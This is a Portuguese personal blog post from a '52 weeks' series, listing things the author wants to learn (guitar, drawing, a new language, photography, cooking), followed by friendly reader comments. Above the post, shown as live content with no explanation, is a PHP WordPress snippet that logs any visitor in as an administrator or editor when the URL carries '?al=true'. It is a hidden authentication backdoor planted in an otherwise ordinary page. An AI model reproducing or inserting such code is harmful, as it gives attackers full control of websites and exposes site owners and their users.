// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2);
![]() |
| Sei lá, gostei dessa foto… |
Oi pessoal!
A semana 32 do projeto 52 semanas tá pra lá de muitíssimo atrasada, mas vim hoje responder! Vamos ver?
Essa semana é sobre coisas que ainda quero aprender, e achei muito interessante pois adoro aprender coisas novas.
Semana 32: Ainda quero aprender…
1. Tocar violão: Sempre foi um sonho aprender a tocar violão. Acho um instrumento lindo, com um som maravilhoso e sempre gostei do clima daquelas rodas de violão, uma pessoa tocando e a galera cantando..
![]() |
| “Roubada” do We♥it |
2. Desenhar: Ok, não sou do tipo que não sabe desenhar NADA, mas ainda quero fazer um curso de desenho ou algo assim para melhorar.
![]() |
| Desenho que fiz da Taylor Momsen há alguns meses atras… Sei lá, apesar de ter outros melhores, gosto desse desenho! |
3. Outro idioma: Além do inglês. Ok, não sou nenhuma expert em inglês, mas me viro tanto lendo quanto falando/ouvindo. Mas ainda quero aprender outro idioma, talvez Italiano ou Espanhol(só sei ler).
![]() |
| “Roubada” do Google :p |
4. Fotografar: “Aaah mas é só pegar a máquina e tirar foto” NÃO! Ainda quero aprender a fotografar, sabendo usar todos os recursos de uma câmera profissional, sabendo como aproveitar melhor a luz, os espaços e tudo mais… enfim, fazer um bom curso de fotografia.
![]() |
| Peguei no Tumblr! |
5. Cozinhar: Sei fazer alguns bolos, fritar ovo, fazer pipoca e brigadeiro. Quero aprender a cozinhar tanto coisas do dia-a-dia (arroz, feijão, carne, etc) quanto coisas mais elaboradas.
![]() |
| Haha, precisa explicar? Ratatouille! |
É isso pessoal!
E vocês, o que ainda querem aprender? Me contem!
Beijos, e até a próxima!
José Adauto Resende
Violão, medicina, vários idiomas, meditação: só se houver várias encarnações para a frente. Talvez tenha uma chance… kkkk Beijinho!!!
Bárbara Grando
Oi,
Eu também quero aprender tudo isso. É tão bom aprender coisas novas.
Beijos *Babi*(diquinhasdababinha.blogospot.com)
Laura Nolasco
kkkkkk é, tem muuuita coisa que eu ainda quero aprender também…
Beeijos!
Laura Nolasco
Haha, é sim… aprender é sempre muito bom!
Beijos!
Belle Bueno
Nossa quanta coisa interessante! Eu também quero aprender coisas novas, e também conseguir bons resultados naquilo que eu já aprendo. Eu sei cozinhar as coisas convencionais, mas o que eu mais adoro é inventar receitas, na maioria das vezes o resultado é excelente! fotografia é uma ate maravilhosa, admiro muito quem sabe usar uma câmera corretamente. Espero que você possa aprender tudo isso e muito mais!
Um beijo õ/
Laura Nolasco
Haha, espero que você também consiga aprender e ter bons resultados em tudo que quiser!
Beijos